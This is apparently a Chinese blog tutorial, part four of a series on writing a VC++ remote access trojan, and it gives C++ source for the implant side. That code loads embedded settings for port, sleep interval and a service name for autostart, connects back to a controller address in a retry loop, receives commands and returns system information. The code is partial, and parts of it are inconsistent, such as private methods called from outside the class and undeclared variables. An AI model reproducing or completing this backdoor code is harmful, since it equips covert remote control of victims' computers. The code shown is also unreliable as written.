红队专题-从零开始VC++远程控制软件RAT-C/S-[4]客户端与服务端连接

招募六边形战士队员

一起学习 代码审计、安全开发、web攻防、逆向等。。。
私信联系

服务端编写

新建工程

server函数

// FackExec_N0vv.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"


void Server();

void Server()
{
    CThreadMain Thread_Main;  // 主线程类
    Thread_Main.GetInfo(); //获取配置信息
    if(Auto[1] == '1')
    {
        wcscpy_s(Thread_Main.MyServiceName,(wchar_t*)ServiceName);
    }
    while(true)
    {
        if(Thread_Main.RunFlag == false)
        {
            break;
        }
        SOCKET sock;
        sock = Thread_Main.Run();
        Thread_Main.Command(sock);
    }
}

int _tmain(int argc, _TCHAR* argv[])
{
	Server();
	return 0;
}

创建主线程类

获取配置信息

 void CThreadMain::GetInfo()
{
    int Port = atoi(czPort);
    this->Time = atoi(czTime);
    this->SetupDir = atoi(czSetupDir);
    this->AutoFlag = atoi(czAuto);
}

SOCKET CThreadMain::Run()
{
    SOCKET sock;
    while(true)
    {
        sock = m_sock.StartSocket(this->Address);
        if(sock == NULL)
        {
            Sleep(this->Time * 1000);
            printf("Sleep\n");
            continue;
        }
        else
        {
            break;
        }
    }
    return sock; 

}

command 命令

void CThreadMain::Command(SOCKET Sock)
{
    MSGINFO_S msg;
    m_Socket = Sock;
    while(1)
    {
        if(this->RunFlag == false)
        {
            break;
        }
        memset(&msg,0,sizeof(MSGINFO_S));
        if(m_sock.MyRecv(Sock,(char*)&msg,sizeof(MSGINFO_S))==0)
        {
            break;
        }
        ExecCommand(msg,Sock);
    }
    return;
}


void CThreadMain::ExecCommand(MSGINFO_S msg,SOCKET l_Socket)
{
    switch(msg.Msg_id)
        {
        case SYSINFO:
            {
                printf("GetSystemInfo\n");
                m_sys.SendSysinfo(l_Socket);
            }
            break;
        default:
            {
                printf("UnKnow Command\n");
                return;
            }
        }
}

startsocket 开始监听

SOCKET CMySocket::StartSocket(char Address[160])
{
    WSADATA data;
    WORD w=MAKEWORD(2,2);
    ::WSAStartup(w,&data);
    SOCKET s;
    s=::socket(AF_INET,SOCK_STREAM,0);
    sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(m_port);
    addr.sin_addr.S_un.S_addr = inet_addr(Address);
    if(::connect(s,(sockaddr*)&addr,sizeof(addr))==SOCKET_ERROR)
    {
        printf("Connect Error\n");
        DWORD e = GetLastError();
        printf("LastError:%d\n",e);
        s = NULL;
    }
    else
    {
        printf("Connect Success!\n");
    }
    return s;
}

win32 类库/头文件

#include
#pragma comment(lib,“ws2_32.lib”)
#pragma comment(lib,“User32.lib”)
#pragma comment(lib,“Advapi32.lib”)

#pragma once

class CThreadMain
{
public:
	CThreadMain(void);
	~CThreadMain(void);


private:
	void GetInfo();
	SOCKET Run();
	void Command(SOCKET Sock);
	void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);
};